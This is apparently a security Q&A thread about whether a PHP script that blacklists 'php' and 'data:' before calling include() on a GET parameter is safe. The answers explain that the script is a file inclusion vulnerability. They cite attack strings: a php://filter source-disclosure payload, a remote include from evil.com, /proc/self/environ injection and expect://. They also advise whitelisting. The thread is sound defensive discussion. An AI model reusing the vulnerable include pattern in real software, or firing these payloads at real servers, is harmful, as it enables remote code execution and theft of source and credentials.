# Will the following PHP code result in source code info leak/disclosure?

Tags: php, exploit, audit, code-review

I'm aware of this vulnerability via PHP's `filter` stream wrapper that is able to disclose PHP source code: `file=php://filter/convert.base64-encode/resource=filename.php`.

So I went ahead to guard against this kind of attack/exploit, by filtering for/away the "php" keyword, to attempt to stop any PHP stream wrapper.

Any idea whether this is safe/secure enough, or is there another possible attack/injection vector to exploit & view the source code of my PHP scripts?

For reference, if it matters, I'm serving these PHP scripts via `nginx` and `PHP 5.5.9` on Ubuntu.

```
if (!isset($_GET["file"])) { die(); }
$file = $_GET["file"];
if (preg_match("/data:/i", $file)) {
    die();
}
$file = trim($file);
if (preg_match("/php/i", $file)) {
    die();
}
include($file);
```

Thanks

Answer (score 5, accepted):

First of all, you are not merely disclosing file content. You are **executing** it.

If php is configured to allow URL inclusion the attacker can simply do `file=http://evil.com/attackercode.txt` and your script will execute the attackers code.

Alternatively the attacker can perform a local file include by sending php code in request headers and do `file=/proc/self/environ` or any other number of attacks.

In short you should ideally never call include on user supplied data.

Comment: What if I also disabled `http` (my `allow_url_include=0`) and other protocols stated [here](http://php.net/manual/en/wrappers.php)? I can't quite trigger the "sending php code in request headers and do file=/proc/self/environ" attack that you speak of. Details pls?

Comment: say if I had a file `sql.php` in the same folder which contained user login credentials, would an attacker be able to extract that?

Answer (score 1):

Blacklisting is rarely a good idea. A whitelist would be a better approach.

Say you are using includes for language selection. Check whether `file` equals `english`, `french`, or `german` for example. Call `die()` if not. Then it does not matter if a user supplies `http://example.com/evil.php`, `php://filter/convert.base64-encode/resource=filename.php` or `sql.php` as your code will not execute it.

By the way, the attacker would not be able to see what was in `sql.php` - the PHP interpreter would simply execute the included code as though it was in the current file. However, you should still only include files you are expecting.

Comment: so your claim is that there's no way, given my setup, that the source of `sql.php`, for instance, can be viewed? (also assuming external connections via `http` URLs for example are also disabled)

Comment: @AdelineHo: If `sql.php` was included with `include`, it would be executed, not output.

Comment: yes, true. but without that /php/ filter, this `php://filter/convert.base64-encode/resource=sql.php` would succeed, and return a base64-encoded version of the source code, since it won't execute that base64-encoded payload, right? so, is there like no other way to do it with the /php/ filter implemented?

Comment: @AdelineHo: If you're whitelisting the full `file` string, how can an attacker pass a string beginning with `php://`?

Comment: yea, so I just wanted to know if doing that (as in the `preg_match` part)'s like *really* safe to block all `php://` kind of attacks.

Comment: @adeline ho your focus is too narrow, if I can use a trivial bug to run php code I control it is simple to read the content of the file. There are other filters that can be used too like expect://

Comment: expect:// doesn't seem to be available on my system, as per `print_r(stream_get_wrappers());`